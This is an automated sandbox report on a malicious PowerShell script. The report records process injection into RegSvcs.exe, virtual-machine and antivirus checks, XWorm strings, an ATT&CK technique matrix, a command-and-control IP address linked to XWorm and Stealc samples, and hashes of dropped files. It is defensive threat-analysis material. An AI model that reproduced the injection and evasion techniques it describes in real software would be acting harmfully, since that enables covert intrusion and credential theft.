      Source: Amcache.hve.0.dr Binary or memory string: vmci.sys
      Source: Amcache.hve.0.dr Binary or memory string: vmci.syshbin`
      Source: Amcache.hve.0.dr Binary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.0.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.0.dr Binary or memory string: VMware20,1
      Source: Amcache.hve.0.dr Binary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.0.dr Binary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.0.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.0.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.0.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.0.dr Binary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.0.dr Binary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual RAM
      Source: Amcache.hve.0.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.0.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42C000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A0C008
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5968" "2404" "2616" "2496" "0" "0" "2348" "0" "0" "0" "0" "0"
      Source: RegSvcs.exe, 00000004.00000002.3156793312.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002E82000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
      Source: RegSvcs.exe, 00000004.00000002.3156793312.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002E82000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
      Source: RegSvcs.exe, 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
      Source: RegSvcs.exe, 00000004.00000002.3156793312.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002E82000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
      Source: RegSvcs.exe, 00000004.00000002.3156793312.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002E82000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managert-
      Source: RegSvcs.exe, 00000004.00000002.3156793312.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002E82000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager\
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: Amcache.hve.0.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.0.dr Binary or memory string: msmpeng.exe
      Source: Amcache.hve.0.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.0.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.0.dr Binary or memory string: MsMpEng.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

      Stealing of Sensitive Information

      Source: Yara match File source: 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1056, type: MEMORYSTR

      Remote Access Functionality

      Source: Yara match File source: 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1056, type: MEMORYSTR

      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 212 Process Injection | 1 Masquerading | OS Credential Dumping | 241 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 241 Virtualization/Sandbox Evasion | Security Account Manager | 241 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 212 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Obfuscated Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | 23 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

      Source | Detection | Scanner | Label | Link
      QP2uO3eN2p.ps1 | 24% | ReversingLabs | Win32.Trojan.Generic |
      QP2uO3eN2p.ps1 | 28% | Virustotal | | Browse

      No Antivirus matches

      Source | Detection | Scanner | Label | Link
      92.255.57.155 | 0% | Avira URL Cloud | safe |

      No contacted domains info

      Name | Malicious | Antivirus Detection | Reputation
      92.255.57.155 | true | Avira URL Cloud: safe | unknown

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1688656796.000001E71BBF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmp | false | | high
      http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmp | false | | high
      http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://go.micro | powershell.exe, 00000000.00000002.1673465265.000001E70CA36000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://contoso.com/ | powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1688656796.000001E71BBF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://contoso.com/License | powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://contoso.com/Icon | powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmp | false | | high
      http://upx.sf.net | Amcache.hve.0.dr | false | | high
      https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1673465265.000001E70B861000.00000004.00000800.00020000.00000000.sdmp | false | | high
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1673465265.000001E70B861000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp | false | | high
      https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmp | false | | high

      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
      92.255.57.155 | unknown | Russian Federation | | 42253 | TELSPRU | true

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1577167
                              Start date and time:2024-12-18 08:14:13 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 56s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:15
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:QP2uO3eN2p.ps1
                              renamed because original name is a hash value
                              Original Sample Name:7dc08327ae721c3ecf12447901858457bf510dd7016838839a629f86d673b18b.ps1
                              Detection:MAL
                              Classification:mal100.troj.evad.winPS1@9/14@0/1
                              EGA Information:
                              • Successful, ratio: 50%
                              HCA Information:
                              • Successful, ratio: 94%
                              • Number of executed functions: 96
                              • Number of non-executed functions: 23
                              Cookbook Comments:
                              • Found application associated with file extension: .ps1
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 20.189.173.20, 40.126.53.13, 4.175.87.197, 13.107.246.63
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target powershell.exe, PID 5968 because it is empty
• Not all processes were analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
02:15:23 | API Interceptor | 41x Sleep call for process: powershell.exe modified
02:15:27 | API Interceptor | 5070157x Sleep call for process: RegSvcs.exe modified
02:15:36 | API Interceptor | 1x Sleep call for process: wermgr.exe modified
02:18:04 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match: 92.255.57.155
Associated Sample Name / URL | Detection | Threat Name | Context
anyrunsample.ps1 | malicious | Unknown | 92.255.57.155/1/1.png
https://reviewgustereports.com/ | malicious | CAPTCHA Scam ClickFix, XWorm | 92.255.57.155/1/1.png
                              No context
Match: TELSPRU
Associated Sample Name / URL | Detection | Threat Name | Context
mhqxUdpe7V.ps1 | malicious | XWorm | 92.255.57.155
MiGFg375KJ.exe | malicious | XWorm | 92.255.57.155
anyrunsample.ps1 | malicious | Unknown | 92.255.57.155
sEOELQpFOB.lnk | malicious | RedLine | 92.255.57.75
ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk | malicious | RedLine, SectopRAT | 92.255.57.75
fa20b849ebe7c53d59f3ed0fcfac8445ea08e7296af5a.exe | malicious | Stealc | 92.255.57.89
LXS5itpTK7.exe | malicious | Stealc | 92.255.57.89
SEejSLAS9f.exe | malicious | Stealc | 92.255.57.89
mMgFHz9PdG.exe | malicious | Stealc | 92.255.57.89
vCZfRWB1kd.exe | malicious | Stealc | 92.255.57.89
                              No context
                              No context
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.2142835581447349
                              Encrypted:false
                              SSDEEP:192:OYlQHlk8QUoqz0BU/Sa6egt0GopzuiFUZ24IO8a9:hw3QjVBU/Saqtv+zuiFUY4IO8a9
                              MD5:1FD06AE5152FE36DCE80834E2840566A
                              SHA1:F809193961C5745EAFC57CB77F2F70B5BC6888D5
                              SHA-256:6E69A7DDC06BE0B0D3078412435599476FF04E1B60DE60CD8D0DD9DA745FDB3F
                              SHA-512:032947BA17AF91082E9072C119836834DBE5EE18225F70F13114BD641E9C41C6A16E1BF7CCA16373A0E109AD4EB8AEAA3F3A43B62CA4B85A3D3F368D17DBC097
                              Malicious:false
                              Reputation:low
                              Process:C:\Windows\System32\wermgr.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.5318307310585444
                              Encrypted:false
                              SSDEEP:96:TSrn+FMAjirxYidgRH3Uje0e35/3ooLF1QXIGZAX/d5FMT2SlPkpXmTAJf/VXT5t:92iimGgR30m8AzuiFRZ24lO8
                              MD5:E3310AFA7F21399BC86B453E73E58436
                              SHA1:42C3BC65478A34B89B56B12FFE1BB742534D491D
                              SHA-256:90389CC4E78CEA46FB45778D8B77ED77BE961A5F705F0D26C9F735C7593CDC0B
                              SHA-512:A2752A7A972CC6C180C0E52CEE50DAB912360053947F55D2EEBCE6621652524BCBB8EE0FF31902E8E237B8E4C7BF7680DE5080121CFF4F578BFB5C4B23D5B726
                              Malicious:false
                              Reputation:low
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 07:17:59 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):362291
                              Entropy (8bit):3.426765514257989
                              Encrypted:false
                              SSDEEP:3072:iarx17c4uEqIy2yLTgYa+WjL7X69PXa/lhZTWydDIib:icx17c4xyLTgYtKL7Xn/l3NdDT
                              MD5:5404928F25CFA02CA67D8628A9B87E15
                              SHA1:584399409ACC691F9C079C7D42289B6B7025D481
                              SHA-256:4B4B0D956820ED3664ED28218EB8BE55B95F3DBD2CBD1478821B4E1ECE042BBD
                              SHA-512:C672F659B1B692C441100C3CD9AFED152C28B4BC8219918E4A42F5722B939D130267F5B37125E399769E176E6B51CBCEF0175271A2329359CDDA5A0BE7628E86
                              Malicious:false
                              Reputation:low
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8360
                              Entropy (8bit):3.691380624078792
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJMfk67a6YBWfSLegmfZ8vprf89bB9sfZRLm:R6lXJMc6W6YBGSCgmfOyB2fa
                              MD5:24D2420A49FE15499B79B16DC40AEB82
                              SHA1:FEB78DF597872745B75A62F83A29FE66D4720BBB
                              SHA-256:BDE61A54EEB6C7A13075D14C81A96CE6E04EAF0B56D87979AA0B876C8FD5E1CA
                              SHA-512:38002F176B8A93F52D5EEF2B7BB03D7ECE67A0A1BF84A37ADF5A68D7B51E36886D9D31250FA56F0F33E986029BDF6AC444F63D75BCFBF5B6B6AF4315B81DE7F9
                              Malicious:false
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4728
                              Entropy (8bit):4.445659107027491
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsOJg77aI9NiWpW8VY4Ym8M4J3cFW+q8vYwlmDIDwMrd:uIjfEI7/j7VoJzKBlmDILrd
                              MD5:4B353C3E80292F0A82F3E4D4466907C7
                              SHA1:BA4658E03C26269C8702976C4B7D11B2FC33734E
                              SHA-256:0B332F6F7A3FCF3B292882E2F1C1751FBA589E07F43F4A172852DEE939E32CE6
                              SHA-512:954603CDA9419103F43FA216604E76602428D187CC859753D26855CC9449314821C1CF384C5D1C3D2D34F865E954455C2C88E30D7B3D7376B940967AFFF39664
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636380" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\System32\wermgr.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7286
                              Entropy (8bit):3.7361959397539373
                              Encrypted:false
                              SSDEEP:96:RSIU6o7wVetbpkQuQYBYl6Y274FIgmfHNpX6PbVF5aMS895QGm:R6l7wVeJpkZdul6YS4FIgmftYtpS8bm
                              MD5:0B3DCDC85CE8C8DC5359A99738BD1A02
                              SHA1:74275DF68A2E9CC178791C2CE4AED440E0B932C7
                              SHA-256:51DC2E83E460C56E596613FA41B807D6B2AEF3151CD79D8180122A14E175EE0D
                              SHA-512:9B7FC0467221C4B5AC77F023DC9B39001361FF156849454068DB8CB84BB6653FF5683F4D115CAC53D4E5FD4F14CD7FDA1813A32CD832EA551A8D9B0AC9DCD28B
                              Malicious:false
                              Process:C:\Windows\System32\wermgr.exe
                              File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4905
                              Entropy (8bit):4.692457403227203
                              Encrypted:false
                              SSDEEP:96:uIjfnnI7uj7V4JFKloFevAFW+WTzFevAFj/ufTd:uIznYuj7245H5syufh
                              MD5:96A902CA7C4109192385935DFBA5E43A
                              SHA1:40E0C3367983F5AF69CD9DAE01269966DC3ACA8A
                              SHA-256:125F6E63056AE1A4E7254F422FA119257CC82DB9E5F0E2DFEDFBF950F5A378E3
                              SHA-512:D03EFBCB439C1CD4462ACA78591466FCDB8BB76D1A49AF42C75B2B4D27327156CEA5A72CE72E0AB6283EE1409787915241EEA259A0421DBDE63CE9AD4C6C6FC0
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636378" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11608
                              Entropy (8bit):4.890472898059848
                              Encrypted:false
                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                              Malicious:false
                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:NlllulVmdtZ:NllUM
                              MD5:013016A37665E1E37F0A3576A8EC8324
                              SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                              SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                              SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                              Malicious:false
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6222
                              Entropy (8bit):3.73014591243326
                              Encrypted:false
                              SSDEEP:48:Q5tBQaOoCnWU23seukvhkvklCyw7tkewbbBl1BSogZoRjEewbbBl/BSogZoRv1:Wj7CnP8mkvhkvCCt72NbBwHkINbB2Hkd
                              MD5:C7DC63B1E0E3369EDDA2F6E1F61E5CEB
                              SHA1:351E42A16AF3EFBBEB4267BF352CABE11A2045F0
                              SHA-256:A514259E49348FA4C05F4EC6C84460300C95E3CF563DBCB9ACF9646182F0F015
                              SHA-512:A9254C14F0DB740DF5735353410F9C7D9035E193F5448962EFC0DD6CCEDE6031054E108E068DEE41DB455D12674C6796DA54BD1D3E65045F542688A61A59D9D2
                              Malicious:false
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):1835008
                              Entropy (8bit):4.37642127852145
                              Encrypted:false
                              SSDEEP:6144:UFVfpi6ceLP/9skLmb0ByWWSPtaJG8nAge35OlMMhA2AX4WABlguNhiL:0V1TyWWI/glMM6kF7zq
                              MD5:3B9748979D50797BE4A2A203F9DEF2C0
                              SHA1:A8688627C7ADD43B4E0793C42661A10354935549
                              SHA-256:C97129BD9857FF48CE3A30211F33041F6E940E9E2514E39FB54BB8E3585ADAB7
